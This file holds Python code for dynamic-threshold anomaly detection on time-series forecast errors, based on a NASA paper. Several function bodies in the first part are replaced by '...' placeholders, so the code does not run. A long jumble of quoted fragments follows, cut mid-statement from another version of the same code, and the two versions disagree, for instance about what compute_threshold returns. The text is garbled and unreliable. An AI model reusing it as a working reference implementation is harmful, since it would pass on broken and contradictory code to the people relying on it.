def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0):
    """Helper method that calculates the epsilon (threshold) for anomalies."""
    mu = np.mean(smoothed_errors)
    sigma = np.std(smoothed_errors)

    max_epsilon = 0
    sd_threshold = sd_limit

    # The threshold is determined dynamically by testing multiple Zs.
    # z is drawn from an ordered set of positive values representing the
    # number of standard deviations above mean(smoothed_errors).
    # here we iterate in increments of 0.5 on the range that the NASA paper
    # found to be good
    for z in np.arange(2.5, sd_limit, 0.5):
        epsilon = mu + (sigma * z)
        below_epsilon, below_indices, above_epsilon = [], [], []

        for i in range(len(smoothed_errors)):
            e = smoothed_errors[i]
            if e < epsilon:
                # save to compute delta mean and delta std
                below_epsilon.append(e)
                below_indices.append(i)
            if e > epsilon:
                # above_epsilon values are anomalies
                for j in range(0, error_buffer):
                    if (i + j) not in above_epsilon and (i + j) < len(smoothed_errors):
                        above_epsilon.append(i + j)
                    if (i - j) not in above_epsilon and (i - j) >= 0:
                        above_epsilon.append(i - j)

        if len(above_epsilon) == 0:
            continue

        # generate sequences
        above_epsilon = sorted(list(set(above_epsilon)))
        groups = [list(group) for group in mit.consecutive_groups(above_epsilon)]
        above_sequences = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]

        mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu
        sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma
        epsilon = (mean_perc_decrease + sd_perc_decrease) /\
            (len(above_sequences)**2 + len(above_epsilon))

        # update the largest epsilon we've seen so far
        if epsilon > max_epsilon:
            sd_threshold = z
            max_epsilon = epsilon

    # sd_threshold can be ...
    return mu + (sd_threshold * sigma), sd_threshold


def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer):
    """ Helper method to get anomalies. """
    mu = np.mean(smoothed_errors)
    sigma = np.std(smoothed_errors)
    epsilon = mu + (z * sigma)

    # compare to epsilon
    errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies(
        smoothed_errors,
        epsilon,
        y_true,
        error_buffer,
        window,
        all_anomalies
    )

    if len(errors_seq) > 0:
        anomaly_indices = prune_anomalies(
            errors_seq,
            smoothed_errors,
            max_error_below_e,
            anomaly_indices
        )

    return anomaly_indices


def group_consecutive_anomalies(smoothed_errors,
                                epsilon,
                                y_true,
                                error_buffer,
                                window,
                                all_anomalies,
                                batch_size=30):
    upper_percentile, lower_percentile = np.percentile(y_true, [95, 5])
    accepted_range = upper_percentile - lower_percentile

    minimum_index = 100  # have a cutoff value for anomalies until model is trained enough

    anomaly_indices = []
    max_error_below_e = 0

    for i in range(len(smoothed_errors)):
        if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= ...:
            continue
        for j in range(error_buffer):
            if (i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices:
                if (i + j) > minimum_index:
                    anomaly_indices.append(i + j)
            if (i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices:
                if (i - j) > minimum_index:
                    anomaly_indices.append(i - j)

    # get all the errors that are below epsilon and which
    # weren't identified as anomalies to process them
    for i in range(len(smoothed_errors)):
        adjusted_index = i + (window - 1) * batch_size
        if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies:
            if i not in anomaly_indices:
                max_error_below_e = smoothed_errors[i]

    # group anomalies into continuous sequences
    anomaly_indices = sorted(list(set(anomaly_indices)))
    groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)]
    e_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]

    return e_seq, anomaly_indices, max_error_below_e


def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices):
    """ Helper method that removes anomalies which don't meet
    a minimum separation from the next anomaly.
    """
    # min accepted perc decrease btwn max errors in anomalous sequences
    MIN_PERCENT_DECREASE = 0.05
    e_seq_max, smoothed_errors_max = [], []

    for error_seq in e_seq:
        if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0:
            sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]]
            e_seq_max.append(max(sliced_errors))
            smoothed_errors_max.append(max(sliced_errors))

    smoothed_errors_max.sort(reverse=True)

    if max_error_below_e > 0:
        smoothed_errors_max.append(max_error_below_e)

    indices_remove = []
    for i in range(len(smoothed_errors_max)):
        if i < len(smoothed_errors_max) - 1:
            delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1]
            perc_change = delta / smoothed_errors_max[i]
            if perc_change < MIN_PERCENT_DECREASE:
                indices_remove.append(e_seq_max.index(smoothed_errors_max[i]))

    for index in ...:
        ...

    for i in anomaly_indices:
        for error_seq in e_seq:
            if i >= error_seq[0] and i <= error_seq[1]:
                ...
"in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper",
"to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies",
"g[-1]) for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e",
"for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer,",
"update the largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold",
"smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in",
"< len(smoothed_errors) and (i + j) not in anomaly_indices: if (i + j)",
"i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and i",
"anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the",
"error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies.",
"def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies.",
"epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for",
"* batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups",
"them for i in range(len(smoothed_errors)): adjusted_index = i + (window - 1) *",
"method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu =",
"group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not",
"mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if not g[0] ==",
"for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv,",
"[], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon:",
"anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon",
"= compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) )",
"# these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon:",
"j in range(0, error_buffer): if (i + j) not in above_epsilon and (i",
"> 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i <",
"= z max_epsilon = epsilon # sd_threshold can be multiplied by sigma to",
"\"scores\" for anomalies based on the max distance from epsilon for each sequence",
"(i + j) > minimum_index: anomaly_indices.append(i + j) if (i - j) <",
"np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare",
"anomalies from the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int):",
"i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i *",
"forecasting error for two arrays of data. If smoothed errors desired, runs EWMA.",
"y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size *",
"anomalies for j in range(0, error_buffer): if (i + j) not in above_epsilon",
"determined dynamically by testing multiple Zs. # z is drawn from an ordered",
"len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon and (i",
"be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true,",
"max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) >",
"sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for",
"mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]]",
"thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5,",
"to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu",
"sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied by sigma",
"all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile",
"in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for",
"in the implementation of NASA paper but # wasn't referenced in the paper",
"Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\"",
"above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0],",
"calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for",
"if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices",
"= (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon",
"historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in",
"0: left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return",
"= i * batch_size curr_index = (window_size * batch_size) + (i * batch_size)",
"for j in range(0, error_buffer): if (i + j) not in above_epsilon and",
"= sd_limit # The treshold is determined dynamically by testing multiple Zs. #",
"smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) -",
"window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows",
"not smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg =",
"+ (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer)",
"right_window = i + historical_error_window + 1 if left_window < 0: left_window =",
"right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size,",
"multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z,",
"# here we iterate in increments of 0.5 on the range that the",
"above_epsilon.append(i + j) if (i - j) not in above_epsilon and (i -",
"# have a cutoff value for anomalies until model is trained enough anomaly_indices",
"np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors] epsilon_inv,",
"smoothed_errors[i] if e < epsilon: # save to compute delta mean and delta",
"- 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta /",
"= [] for i in anomaly_indices: for error_seq in e_seq: if i >=",
"< MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = []",
"if specified by user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t",
"\"\"\" errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if",
"def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold)",
"method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma =",
"mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for",
"group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if not",
"1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if",
"if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors,",
"+ i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices =",
"= sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1])",
"in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon)",
"error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors (): window_size",
"if not g[0] == g[-1]] # generate \"scores\" for anomalies based on the",
"(i - j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i",
"len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed",
"max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied by",
"epsilon = mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices,",
"= mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e",
") return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile",
"if e > epsilon: # above_epsilon values are anomalies for j in range(0,",
"trained enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if",
"errors # This was done in the implementation of NASA paper but #",
"0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors,",
"len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group)",
"j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i - j)",
"epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies(",
"= (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2",
"anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in",
"that the NASA paper found to be good for z in np.arange(2.5, sd_limit,",
"+ 1): prev_index = i * batch_size curr_index = (window_size * batch_size) +",
"anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold =",
"e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e",
"(): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size",
"\"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors (): window_size (int):",
"not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease =",
"lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100",
"get all the errors that are below epsilon and which # weren't identified",
"for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if",
"smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change <",
"/ sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update",
"perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in",
"denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors,",
"an ordered set of positive values representing the # number of standard deviations",
"in range(error_buffer): if (i + j) < len(smoothed_errors) and (i + j) not",
"error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get",
"indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i",
"\"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu",
"a minimum separation from next anomaly. \"\"\" # min accepted perc decrease btwn",
"anomaly. \"\"\" # min accepted perc decrease btwn max errors in anomalous sequences",
"[] for i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0]",
"y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window",
"above_sequences = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]",
"== num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index]",
"e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes",
"[] for i in range(len(errors)): left_window = i - historical_error_window right_window = i",
"of smoothed errors # This was done in the implementation of NASA paper",
"above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon =",
"* smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window = i -",
"upper_percentile - lower_percentile minimum_index = 100 # have a cutoff value for anomalies",
"smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i]))",
"[list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups",
"+ j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in",
"in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i",
"(i * batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors",
"(list): error residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h -",
"np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to epsilon errors_seq,",
"sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so",
"max distance from epsilon for each sequence anomalies_scores = [] for e_seq in",
"j) if (i - j) not in above_epsilon and (i - j) >=",
"in increments of 0.5 on the range that the NASA paper found to",
"\"\"\" Helper method that removes anomalies which don't meet a minimum separation from",
"good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma *",
"for j in range(error_buffer): if (i + j) < len(smoothed_errors) and (i +",
"but # wasn't referenced in the paper # we get the inverse by",
"sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\",
"1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold =",
"= [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in",
"+ (i * batch_size) if i == num_windows + 1: curr_index = len(y_true)",
"+ len(above_epsilon)) # update the largest epsilon we've seen so far if epsilon",
"z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu =",
"def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for",
"def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args:",
"positive values representing the # number of standard deviations above mean(smoothed_errors) # here",
"data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True):",
"0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true,",
"y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq,",
"= list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices])",
"mean(smoothed_errors) # here we iterate in increments of 0.5 on the range that",
"j) if (i - j) < len(smoothed_errors) and (i - j) not in",
"== 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for",
"increments of 0.5 on the range that the NASA paper found to be",
"for two arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat",
"> 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e)",
"on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30,",
"done in the implementation of NASA paper but # wasn't referenced in the",
"https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error",
"(z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors,",
"error_buffer ) # get anomalies from inverse of smoothed errors # This was",
"error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices =",
"e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] -",
"generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences",
"(i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if",
"smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group)",
"error residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h - y_t)",
"= max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ])",
"== g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma -",
"[] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: #",
"of data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values.",
"smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for",
"epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies )",
"numpy as np # Methods to do dynamic error thresholding on timeseries data",
"(int): smoothing_percent (float): smoothed (bool): whether the returned errors should be smoothed with",
"epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper",
"NASA paper but # wasn't referenced in the paper # we get the",
"anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]]",
"denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator",
"np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon",
"<= 0.05 * accepted_range: # not an anomaly continue for j in range(error_buffer):",
"i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true =",
"anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq)",
"anomalies from inverse of smoothed errors # This was done in the implementation",
"import numpy as np # Methods to do dynamic error thresholding on timeseries",
"sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon =",
"# The treshold is determined dynamically by testing multiple Zs. # z is",
"= [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta",
"for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors)",
"e = smoothed_errors[i] if e < epsilon: # save to compute delta mean",
"true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the",
"i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change",
"group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0]",
"in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv,",
"method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon =",
"the paper # we get the inverse by flipping around the mean mu",
"i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] -",
"= np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for",
"smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices =",
"Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int):",
"window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i,",
"# z is drawn from an ordered set of positive values representing the",
"# number of standard deviations above mean(smoothed_errors) # here we iterate in increments",
"iterate in increments of 0.5 on the range that the NASA paper found",
"= sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1])",
"errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for i",
"z is drawn from an ordered set of positive values representing the #",
"window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size *",
"(int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size:",
"j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j)",
"> minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i",
"i * batch_size curr_index = (window_size * batch_size) + (i * batch_size) if",
"batch_size) + (i * batch_size) if i == num_windows + 1: curr_index =",
"g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon))",
"+ historical_error_window + 1 if left_window < 0: left_window = 0 if right_window",
"mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e =",
"= get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from",
"from epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator",
"<= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue",
"anomaly_indices.append(i - j) # get all the errors that are below epsilon and",
"smoothed (bool): whether the returned errors should be smoothed with EWMA. Returns: (list):",
"left_window = i - historical_error_window right_window = i + historical_error_window + 1 if",
"return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the",
"for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group)",
"of positive values representing the # number of standard deviations above mean(smoothed_errors) #",
"index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices:",
"= i - historical_error_window right_window = i + historical_error_window + 1 if left_window",
"for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in",
"by testing multiple Zs. # z is drawn from an ordered set of",
"for i in range(len(errors)): left_window = i - historical_error_window right_window = i +",
"error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors,",
"y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays",
"not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if",
"get anomalies from inverse of smoothed errors # This was done in the",
"int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for i in",
"prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer,",
"(i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if",
"above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if",
"* window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows + 1):",
"for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are",
"largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold = z",
"anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon,",
"in range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window +",
"Zs. # z is drawn from an ordered set of positive values representing",
"+ 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold",
